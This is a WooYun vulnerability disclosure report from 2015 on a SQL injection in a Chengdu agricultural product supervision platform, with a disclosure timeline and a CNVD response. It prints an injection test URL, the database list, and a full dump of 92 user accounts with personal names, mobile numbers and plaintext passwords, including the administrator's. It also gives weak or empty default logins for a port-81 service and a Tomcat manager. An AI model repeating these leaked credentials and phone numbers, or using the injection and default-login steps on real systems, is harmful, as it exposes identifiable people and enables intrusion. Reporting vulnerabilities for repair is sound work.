当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141455

漏洞标题:某市农产品质量监督平台dba权限sql注入(泄漏大量信息)

相关厂商:cncert国家互联网应急中心

漏洞作者: wsg00d

提交时间:2015-09-18 08:42

修复时间:2015-11-04 18:02

公开时间:2015-11-04 18:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-18: 细节已通知厂商并且等待厂商处理中
2015-09-20: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-30: 细节向核心白帽子及相关领域专家公开
2015-10-10: 细节向普通白帽子公开
2015-10-20: 细节向实习白帽子公开
2015-11-04: 细节向公众公开

简要描述:

某市农产品质量监督平台dba权限sql注入(泄漏大量信息)

详细说明:

成都市农产品质量监督溯源平台 **.**.**.**
存在漏洞网址 http://**.**.**.**/

aaaaaaaaaaaaaaaaaaaa25256.png


sql注入地址:

http://**.**.**.**/query.jsp?status=0&tuid=1%27%22


bbbbbbbbbbbbbbbbbbbbbbbb043.png


oracle的数据库看来数据量有点大

cccccccccccccccccccccccccc16030349.png


当前用户为dba的权限

dddddddddddddddddddddd30516.png


所有数据库

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] VKHDB
[*] WMSYS
[*] XDB


找到了网站后台用户信息

Database: VKHDB
Table: PUB_USER
[92 entries]
+-----------+---------------------+---------------+-------------+
| LOGINNAME | NAME                | PASSWORD      | PHONE       |
+-----------+---------------------+---------------+-------------+
| pznf      | 彭州农发局               | 123456        | 1           |
| xy        | 罗茂凌                 | 123456        | 13658052168 |
| temp      | temp                | temp          | 1           |
| 百信        | 百信                  | 123456        | 18781908733 |
| 邓成友       | 邓成友                 | 123456        | 13558776489 |
| 杨云        | 杨云                  | 123456        | 1           |
| 宋瑾        | 宋瑾                  | 081023        | 15108363919 |
| 范刚        | 范刚                  | 123456        | 13880157954 |
| lzy       | 廖纪祥                 | 123456        | 13699038981 |
| 周仲良       | 周仲良                 | 123456        | 15908101498 |
| 北泉        | 三界北泉村               | 123456        | 123         |
| 庄由亮       | 庄由亮                 | 123456        | 18628020933 |
| 升平镇       | 升平镇                 | 123456        | 13541145590 |
| 红岩        | 红岩                  | 123456        | 12121212    |
| 军乐        | 军乐                  | 123456        | 343434      |
| 葛仙山       | 葛仙山                 | 123456        | 32323       |
| 隆丰        | 隆丰                  | 123456        | 323232      |
| 检测中心      | 检测中心                | 654321        | 222         |
| xyl       | xyl                 | 123456        | 123456      |
| 三王        | 濛阳三王村               | 123456        | 123         |
| 普华        | 濛阳普华村               | 123456        | 123         |
| 电光        | 濛阳电光村               | 123456        | 123         |
| 大汉        | 濛阳大汉村               | 123456        | 123         |
| 青江        | 蒙阳镇青江村              | 123456        | 123         |
| 东塔        | 濛阳东塔社区              | 123456        | 123456789   |
| 王明        | 王明                  | 123456        | 13709032742 |
| 何付勇       | 何付勇                 | 123456        | 13980468698 |
| 利民        | 利民                  | 123456        | 1           |
| 弘大        | 杨刘洪                 | 123456        | 13880551689 |
| 旺登乐       | 旺登乐                 | 123456        | 15882159774 |
| jiaweita  | 成都佳惟他农业有限公司         | 123456        | 123456789   |
| 肖瑶        | 肖瑶                  | 123456        | 18227640021 |
| 蒙阳        | 蒙阳镇                 | 123456        | 22222       |
| 敖平        | 敖平                  | 674164        | 76767       |
| 丹景山       | 丹景山                 | 123456        | 21212       |
| 红家        | 三界镇红家村              | 123456        | 123456      |
| 春山        | 三界镇春山村              | 123456        | 123         |
| 凌泉        | 三界镇凌泉村              | 123456        | 123         |
| 祇园        | 三界镇祇园村              | 123456        | 123         |
| 泉沟        | 濛阳泉沟村               | 123456        | 123         |
| 戊寅        | 濛阳戊寅村               | 123456        | 123         |
| 伏龙        | 濛阳伏龙社区              | 123456        | 123         |
| 永桥        | 濛阳永桥村               | 460201147     | 123         |
| 品真园       | 品真园                 | 123456        | 15184422111 |
| 兴荣        | 兴荣                  | 123456        | 1           |
| 楠新        | 楠新                  | 123456        | 1           |
| 元青        | 元青                  | 123456        | 15828264193 |
| kf        | 壁山                  | 123456        | 15928766457 |
| 方义        | 方义                  | 123456        | 13548163604 |
| 永兴        | 谢余                  | 123456        | 1           |
| tianyuanx | 陈子良                 | 123456        | 15202852383 |
| hongyan   | 杨明祥                 | hongyan123456 | 13540350573 |
| 高林        | 高林                  | 123456        | 13548028447 |
| 张立军       | 张立军                 | 111111        | 15108155888 |
| 凤霞        | 凤霞                  | 123456        | 1           |
| 天彭        | 天彭                  | 123456        | 454545      |
| 丽春        | 丽春                  | 123456        | 121212      |
| mwl       | 濛阳农副产品综合批发交易有限责任公司  | 123456        | 1111        |
| zd        | zd                  | 123456        | 123456      |
| 东平        | 三界镇东平村              | 123456        | 123         |
| 三湾        | 濛阳三湾村               | 123456        | 123         |
| 清卓        | 濛阳清卓村               | 123456        | 123         |
| 桂桥        | 濛阳桂桥村               | 123456        | 123         |
| 22        | 2                   | 22            | 13202563654 |
| test      | test                | test          | 2           |
| 三界        | 三界                  | 123456        | 34343434    |
| jyt       | jyt                 | jyt37510      | 123456789   |
| 白衣        | 三界镇白衣村              | 123456        | 123456      |
| 观圣        | 观圣村                 | 123456        | 123         |
| 文山        | 濛阳文山                | 123456        | 123         |
| 南佛        | 濛阳南佛村               | 123456        | 123         |
| 彩林        | 濛阳彩林村               | 123456        | 123         |
| admin     | 系统管理员               | 87577923      | 77          |
| 建稚        | 胡勇                  | 123456        | 13458502967 |
| aa        | aa                  | aa            | aa          |
| 胜利        | 胜利                  | 123456        | 13683443198 |
| 牌坊        | 牌坊                  | 123456        | 1           |
| 杨继全       | 杨继全                 | 123456        | 13608228096 |
| 圆石        | 杨志友                 | 123456        | 13880073449 |
| 神农        | 张秀娟                 | 123456        | 13980504699 |
| 双林        | 双林                  | 123456        | 1           |
| 九尺镇       | 九尺镇                 | 123456        | 13558657495 |
| 致和        | 致和                  | 123456        | 232323      |
| 中田        | 陈孝建                 | 123456        | 18615703005 |
| 桂花        | 桂花                  | 888888        | 34343       |
| 元胜        | 三界镇元胜村              | 123456        | 123         |
| 高寿        | 三界高寿村               | 123456        | 123         |
| 天王        | 濛阳天王村               | 123456        | 123         |
| 佛踏        | 濛阳佛踏村               | 123456        | 123         |
| 东星        | 濛阳东星社区              | 123456        | 123         |
| 宝祝        | 濛阳宝祝村               | 123456        | 123         |
| 白土河       | 濛阳白土河村              | 123456        | 123         |
+-----------+---------------------+---------------+-------------+


好多弱口令,用系统管理员帐号登录

漏洞证明:

后台功能很强大,可以发现4000+的农户信息,以及一些员工信息,地块信息。。

nonghu.png


yuangogn.png


其它的一些信息

QQ截图20150916001555.png


全市各个公司

aaaaaaaaa.png


还有摄像头,,

sherxiangtou16031700.png


shexiangtouaaaaaaaaaaaa1736.png


bbbbbbbbbbbbbbbbbb6032238.png


修复方案:

此外服务器还开放了另外一个81端口,弱口令 admin 123456

mmmmmmmmmmmmmm33.png


同样里面有很多信息,贴一张图

81.png


最后81端口上的tomcat也存在弱口令
http://**.**.**.**:81/manager/html/
admin 空密码

xxxxxxxxxxxxxxxxxxx6032604.png

版权声明:转载请注明来源 wsg00d@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-20 18:01

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论